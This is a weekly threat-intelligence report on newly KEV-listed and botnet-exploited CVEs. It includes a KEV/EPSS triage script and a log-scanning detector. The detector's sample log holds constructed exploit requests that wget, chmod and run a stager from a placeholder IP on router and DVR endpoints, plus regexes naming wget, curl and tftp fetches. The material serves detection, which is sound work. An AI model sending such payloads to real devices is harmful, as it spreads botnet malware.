The Impact of CISA's Latest Vulnerabilities on Cybersecurity Practices

September 20, 2024
Executive Summary

This week the CISA KEV catalog grew by 12 CVEs, four of which are ancient Adobe Flash Player vulnerabilities: CVE-2014-0497, CVE-2014-0502, CVE-2013-0643 and CVE-2013-0648. Despite being over ten years old, and despite Flash Player itself being end-of-life, these flaws have resurfaced with renewed urgency, a reminder that abandoned software left on endpoints remains an active threat.

Microsoft has confirmed that CVE-2024-43461, a spoofing vulnerability in the Windows MSHTML platform, was exploited by the Void Banshee threat actor as part of an attack chain that delivered Atlantida malware. In addition, two older Microsoft CVEs, CVE-2020-0618 (SQL Server Reporting Services) and CVE-2019-1069 (Windows Task Scheduler), were added to the CISA KEV list, highlighting the ongoing risk from unpatched legacy software.

Ivanti faced a tough week: two vulnerabilities in its Cloud Services Appliance (CSA), CVE-2024-8963 (critical path traversal) and CVE-2024-8190 (high-severity OS command injection), were actively exploited in the wild and are now both in the CISA KEV list. Ivanti reports the two being chained, with the path traversal bypassing the admin authentication that the command injection otherwise requires, and notes that CSA 4.6 is end-of-life, so the fix is to upgrade to CSA 5.0 rather than wait for further 4.6 patches.

The Mirai botnet is ramping up its exploitation efforts, persistently targeting LB-Link BL devices (CVE-2023-26801) and TP-Link Archer AX21 routers (CVE-2023-1389). Meanwhile, the IoT-Reaper botnet remains operational, continuously abusing an eight-year-old remote code execution flaw in MVPower CCTV DVR models (CVE-2016-20016).

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats and support informed remediation decisions. EPSS values quoted below are the probability of exploitation activity in the next 30 days at the time of writing.

CVE-2024-43461
A high-severity (CVSS 8.8) spoofing vulnerability in the Windows MSHTML platform, with an EPSS score of 0.16239, has been leveraged by the Void Banshee threat actor group to deploy Atlantida malware. The vulnerability is now on the CISA Known Exploited Vulnerabilities (KEV) list, underscoring the need for prompt mitigation.

CVE-2024-6670
A critical SQL injection vulnerability in Progress WhatsUp Gold, with an EPSS score of 0.95634, allows an unauthenticated attacker to retrieve the encrypted password of a user without supplying any credentials, effectively bypassing authentication. The issue has been included in the CISA Known Exploited Vulnerabilities (KEV) list; a public proof-of-concept (PoC) exploit exists, so remediation is urgent.

CVE-2024-27348
Recently added to CISA's Known Exploited Vulnerabilities (KEV) list, this critical flaw in Apache HugeGraph-Server (CVSS 9.8, but a low EPSS score of 0.0021) allows a remote attacker to execute arbitrary commands on the server through its Gremlin API. Versions 1.0.0 up to but not including 1.3.0 are affected; upgrade to 1.3.0 and enable the HugeGraph authentication system, which is off by default.

CVE-2024-8963
A critical path traversal vulnerability in Ivanti Cloud Services Appliance (CSA) 4.6, CVSS 9.4, allows a remote, unauthenticated attacker to access restricted functionality on vulnerable appliances. It was added to the CISA Known Exploited Vulnerabilities (KEV) list this week, and Ivanti has observed it being used in conjunction with CVE-2024-8190.

CVE-2024-8190
A high-severity OS command injection vulnerability in Ivanti Cloud Services Appliance (CSA) 4.6, with an EPSS score of 0.15116, allows a remote attacker who holds administrator privileges to execute arbitrary commands on the appliance. It is also listed in the CISA Known Exploited Vulnerabilities (KEV) catalog; chained with the path traversal CVE-2024-8963, the administrator requirement falls away.

CVE-2022-21445
A critical remote code execution vulnerability in the ADF Faces component of Oracle JDeveloper, rated CVSS 9.8 with an EPSS score of 0.00705, allows an unauthenticated attacker to execute arbitrary code on vulnerable systems. This flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) list for prioritized remediation.

CVE-2020-14644
A critical remote code execution vulnerability in Oracle WebLogic Server, rated CVSS 9.8 with an EPSS score of 0.04636, has been exploited in the wild, allowing attackers to take full control of affected servers. It has been added to the CISA KEV list for urgent response.

CVE-2020-0618
A high-severity remote code execution vulnerability in Microsoft SQL Server Reporting Services (SSRS), recently added to the CISA KEV list, carries a very high EPSS score of 0.97335. It allows an attacker to execute arbitrary code in the context of the Report Server service account, posing a significant risk to any internet-facing or under-segmented reporting server.

CVE-2019-1069
A high-severity elevation of privilege vulnerability in Microsoft Windows Task Scheduler, with a low EPSS score of 0.00434, was previously exploited by Conti and Ryuk ransomware. This vulnerability has recently been added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its continued risk.

CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648
These high-severity Adobe Flash Player vulnerabilities, each a decade old, still pose a serious risk because they allow remote attackers to run arbitrary code on systems where the player is installed. The CISA Known Exploited Vulnerabilities (KEV) list has now been updated to include all four. Adobe ended support for Flash Player on 31 December 2020, so there is no patch to apply: the mitigation is to inventory and remove any remaining Flash Player installations and the browser plug-ins that load them.
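The trending entries above mix three prioritisation signals: CISA KEV membership (with its BOD 22-01 due date), EPSS probability and CVSS. The following Python script is an added example, not Loginsoft's tooling, showing how a team can merge the KEV JSON feed and the FIRST EPSS API into one remediation queue. KEV_SAMPLE and EPSS_SAMPLE are constructed samples that mirror the field names of the real feeds; the due dates, the FortiClient EMS entry and the EPSS values not quoted in this report are illustrative, and REPORT_DATE is an assumed "today".

```python
"""Triage a CVE list by CISA KEV membership and EPSS probability (added example).

KEV_SAMPLE / EPSS_SAMPLE are constructed to follow the real feeds' schemas:
  KEV:  https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
  EPSS: https://api.first.org/data/v1/epss?cve=CVE-2020-0618,CVE-2024-43461
Dates and scores in the samples are illustrative, not authoritative.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional
import json

REPORT_DATE = date(2024, 9, 20)  # assumed "today" for due-date arithmetic

KEV_SAMPLE = json.loads("""{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "2024.09.19", "count": 4,
  "vulnerabilities": [
    {"cveID": "CVE-2024-43461", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2024-09-16", "dueDate": "2024-10-07", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2020-0618", "vendorProject": "Microsoft", "product": "SQL Server",
     "dateAdded": "2024-09-18", "dueDate": "2024-10-09", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-27348", "vendorProject": "Apache", "product": "HugeGraph-Server",
     "dateAdded": "2024-09-18", "dueDate": "2024-10-09", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-48788", "vendorProject": "Fortinet", "product": "FortiClient EMS",
     "dateAdded": "2024-03-25", "dueDate": "2024-04-15", "knownRansomwareCampaignUse": "Known"}
  ]
}""")

EPSS_SAMPLE = json.loads("""{
  "status": "OK",
  "data": [
    {"cve": "CVE-2020-0618",  "epss": "0.97335", "percentile": "0.99", "date": "2024-09-20"},
    {"cve": "CVE-2024-43461", "epss": "0.16239", "percentile": "0.95", "date": "2024-09-20"},
    {"cve": "CVE-2024-27348", "epss": "0.00210", "percentile": "0.60", "date": "2024-09-20"},
    {"cve": "CVE-2023-48788", "epss": "0.90000", "percentile": "0.98", "date": "2024-09-20"}
  ]
}""")


@dataclass
class Finding:
    cve: str
    in_kev: bool
    epss: float                 # probability of exploitation activity in the next 30 days
    due_date: Optional[date]    # BOD 22-01 remediation deadline, KEV entries only
    days_to_due: Optional[int]
    ransomware_use: bool

    @property
    def overdue(self) -> bool:
        return self.days_to_due is not None and self.days_to_due < 0


def triage(cves, kev_feed, epss_feed, today=REPORT_DATE):
    """Merge KEV and EPSS data for `cves` and return them in remediation order."""
    kev = {v["cveID"]: v for v in kev_feed["vulnerabilities"]}
    epss = {d["cve"]: float(d["epss"]) for d in epss_feed["data"]}
    findings = []
    for cve in cves:
        entry = kev.get(cve)
        due = date.fromisoformat(entry["dueDate"]) if entry else None
        findings.append(Finding(
            cve=cve,
            in_kev=entry is not None,
            epss=epss.get(cve, 0.0),   # no EPSS row means "unscored", not "safe"
            due_date=due,
            days_to_due=(due - today).days if due else None,
            ransomware_use=bool(entry) and entry.get("knownRansomwareCampaignUse") == "Known",
        ))
    # KEV entries first (most overdue / soonest due first), then by EPSS descending.
    findings.sort(key=lambda f: (not f.in_kev,
                                 f.days_to_due if f.in_kev else float("inf"),
                                 -f.epss))
    return findings


def fetch_json(url: str, timeout: int = 30) -> dict:
    """Fetch a live feed; pass its result in place of the *_SAMPLE constants."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def demo():
    cves = ["CVE-2024-7565", "CVE-2024-27348", "CVE-2020-0618", "CVE-2024-43461", "CVE-2023-48788"]
    return triage(cves, KEV_SAMPLE, EPSS_SAMPLE)


if __name__ == "__main__":
    for f in demo():
        flag = "OVERDUE" if f.overdue else (f"due in {f.days_to_due}d" if f.in_kev else "not in KEV")
        print(f"{f.cve:15} epss={f.epss:.5f} ransomware={f.ransomware_use!s:5} {flag}")
```

Sorting KEV entries by due date before EPSS is deliberate: it stops a compliance deadline from being buried under a KEV-listed flaw with a tiny EPSS value such as CVE-2024-27348, while EPSS still orders everything that KEV does not cover.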

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analysed to derive insight into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV
--- | --- | --- | --- | --- | ---
CVE-2024-4577 | PHP-CGI on Windows | Critical | Argument injection vulnerability in PHP-CGI on Windows servers | True | True
CVE-2024-7029 | AVTECH SECURITY Corporation IP camera | High | Command injection vulnerability in AVTECH AVM1203 IP camera firmware through FullImg-1023-1007-1011-1009 | True | True
CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | False | False
CVE-2023-33010 | Zyxel ATP series firmware | Critical | Buffer overflow in the ID processing function of Zyxel ATP series firmware, leading to denial of service or remote code execution on the affected device | True | True
CVE-2023-26801 | LB-LINK devices | Critical | Command injection vulnerability in LB-LINK devices | True | False
CVE-2023-1389 | TP-Link Archer AX21 | High | Command injection vulnerability in TP-Link Archer AX21 | True | True
CVE-2022-34045 | Wavlink devices | Critical | Hard-coded encryption/decryption key in Wavlink devices | False | False
CVE-2022-30489 | Wavlink devices | Medium | Cross-site scripting vulnerability in Wavlink devices | False | False
CVE-2022-30023 | Tenda devices | High | Command injection via the Ping function in Tenda products | False | False
CVE-2022-25168 | Apache Hadoop | Critical | Command injection in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop | False | False
CVE-2022-24847 | GeoServer | High | Improper input validation in GeoServer leading to arbitrary code execution | False | False
CVE-2022-41040 | Microsoft Exchange Server | High | Server-side request forgery vulnerability in Microsoft Exchange Server | True | True
CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote code execution in Spring Cloud Gateway versions prior to 3.1.1 and 3.0.7 | True | True

Vulnerabilities abused by Botnet

Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The CVEs below carried payloads suggestive of botnet activity, such as fetching a stager with wget from a bare IP address.

Vulnerability | Product | Title | Exploit | Abused by botnet
--- | --- | --- | --- | ---
CVE-2023-26801 | LB-LINK BL devices | Command injection vulnerability in LB-LINK BL-AC1900_2.0 1.0.1, BL-WR9000 2.4.9, BL-X26 1.2.5 and BL-LTE300 1.0.8 | True | Mirai
CVE-2023-1389 | TP-Link Archer AX21 | Unauthenticated command injection vulnerability in the TP-Link Archer AX21 Wi-Fi router | True | AGoent, Gafgyt, Moobot, Miori, Mirai, Condi
CVE-2016-20016 | MVPower CCTV DVR models | Remote code execution vulnerability in MVPower CCTV DVR models | True | IoT-Reaper
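The "wget from an IP address" payload pattern described above is straightforward to detect on a web-facing sensor, reverse proxy or honeypot. The script below is an added example, not Cytellite sensor code: it parses Combined Log Format lines, URL-decodes the request target, and flags requests that hit an endpoint associated with one of the three CVEs in the table (indicators taken from the public CVE descriptions: the LuCI locale form for CVE-2023-1389, /goform/set_LimitClient_cfg for CVE-2023-26801 and the /shell endpoint for CVE-2016-20016), contain shell metacharacters in the query string, or download a stager from a bare IPv4 address. SAMPLE_LOG is constructed and uses RFC 5737 documentation addresses.

```python
"""Flag botnet-style exploitation attempts in web-server access logs (added example).

Not Loginsoft's sensor code. Three heuristics per request: an endpoint tied to a
CVE from the botnet table, shell metacharacters in the query string, and a stager
download from a bare IPv4 address with wget/curl/tftp. SAMPLE_LOG is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import unquote_plus

# Combined Log Format; `target` is non-greedy so raw spaces in the request line survive.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})')

# Endpoint indicators from the public descriptions of the three CVEs.
ENDPOINT_SIGNATURES = {
    "CVE-2023-1389":  re.compile(r"/cgi-bin/luci/;stok=/locale\?.*form=country.*operation=write", re.I),
    "CVE-2023-26801": re.compile(r"^/goform/set_LimitClient_cfg", re.I),
    "CVE-2016-20016": re.compile(r"^/shell\?", re.I),
}
# wget/curl/tftp followed, within the same shell command, by a dotted-quad address.
STAGER_FETCH = re.compile(r"\b(?:wget|curl|tftp)\b[^;|&`]*?(\d{1,3}(?:\.\d{1,3}){3})", re.I)
SHELL_META = re.compile(r"[;|`]|\$\(|&&")

# Constructed sample: three attack requests and two benign ones (RFC 5737 addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Sep/2024:10:01:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28cd+/tmp%3Bwget+http%3A//192.0.2.10/bins/x.arm7%3Bchmod+777+x.arm7%3B./x.arm7%29 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [20/Sep/2024:10:03:15 +0000] "POST /goform/set_LimitClient_cfg HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.5 - - [20/Sep/2024:10:05:40 +0000] "GET /shell?cd+/tmp;wget+http://192.0.2.20/mips;chmod+777+mips;./mips HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [20/Sep/2024:10:06:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Sep/2024:10:06:30 +0000] "GET /search?q=wget+tutorial HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


@dataclass
class Verdict:
    src: str
    target: str
    cves: List[str] = field(default_factory=list)
    stager_ip: Optional[str] = None
    shell_meta: bool = False

    @property
    def suspicious(self) -> bool:
        return bool(self.cves or self.stager_ip or self.shell_meta)


def analyse(line: str) -> Optional[Verdict]:
    """Return a Verdict for one log line, or None if the line is not parseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m["target"])   # decode %XX and '+' before matching
    v = Verdict(src=m["src"], target=target)
    v.cves = [cve for cve, pat in ENDPOINT_SIGNATURES.items() if pat.search(target)]
    fetch = STAGER_FETCH.search(target)
    v.stager_ip = fetch.group(1) if fetch else None
    # Only the query string is checked for metacharacters: LuCI paths legitimately contain ';stok='.
    v.shell_meta = bool(SHELL_META.search(target.partition("?")[2]))
    return v


def scan(lines):
    """Verdicts for the suspicious lines only, in log order."""
    return [v for v in map(analyse, lines) if v and v.suspicious]


def stager_hosts(verdicts):
    """Distinct IPv4 addresses the payloads fetch stagers from: pivot indicators."""
    return {v.stager_ip for v in verdicts if v.stager_ip}


if __name__ == "__main__":
    for v in scan(SAMPLE_LOG):
        print(f"{v.src:15} {','.join(v.cves) or '-':15} stager={v.stager_ip} meta={v.shell_meta}")
    print("stager hosts:", sorted(stager_hosts(scan(SAMPLE_LOG))))
```

POST bodies are not written to access logs, so the LB-LINK request is flagged on its endpoint alone; seeing the injected mac/time1/time2 parameters requires a WAF or full-request capture. The stager addresses that stager_hosts returns are the indicators to pivot on when hunting for the same botnet across other sensors.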

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2024-43461
As reported by The Register, the Void Banshee threat actor exploited this spoofing vulnerability in Windows MSHTML as a zero-day to deploy Atlantida malware. The attack was part of a broader exploit chain that also used CVE-2024-38112, another MSHTML spoofing flaw patched earlier this year.

CVE-2023-48788
A recent Bitdefender investigation revealed that this critical SQL injection vulnerability in Fortinet FortiClient EMS was exploited by the Medusa ransomware group to gain initial access.

Vulnerability | Severity | Title | Patch | Targeted by malware | OSS
--- | --- | --- | --- | --- | ---
CVE-2024-43461 | High | Spoofing vulnerability in Windows MSHTML | True | Void Banshee APT, Atlantida | False
CVE-2023-48788 | Critical | SQL injection vulnerability in Fortinet FortiClient EMS leading to code execution via specially crafted packets | True | Medusa | False

PRE-NVD Observed for this week

This section covers vulnerabilities that were disclosed, and potentially exploited, before their official inclusion in the National Vulnerability Database (NVD). The LOVI platform aggregates and distributes this data from open sources and social media; it currently tracks over 100 security alerts and is planned to expand.

CVE-ID | Type of vulnerability | Product
--- | --- | ---
CVE-2024-7565 | Directory traversal | SmartBear SoapUI
CVE-2024-43689 | Stack-based buffer overflow | ELECOM wireless LAN routers and wireless access points
CVE-2024-30377 | Privilege escalation | G DATA Total Security
CVE-2024-2046 | Arbitrary local file read | Telegram 10.8.2
CVE-2024-8159 | Out-of-bounds read | Visteon Infotainment

External References

  1. https://www.cisa.gov/news-events/alerts/2024/09/18/cisa-adds-five-known-exploited-vulnerabilities-catalog
  2. https://www.cisa.gov/news-events/alerts/2024/09/17/cisa-adds-four-known-exploited-vulnerabilities-catalog
  3. https://www.cisa.gov/news-events/alerts/2024/09/19/cisa-adds-one-known-exploited-vulnerability-catalog
  4. https://www.theregister.com/2024/09/17/microsoft_zero_day_spoofing_flaw/
  5. https://www.cisa.gov/news-events/alerts/2024/09/16/cisa-adds-two-known-exploited-vulnerabilities-catalog
  6. https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/
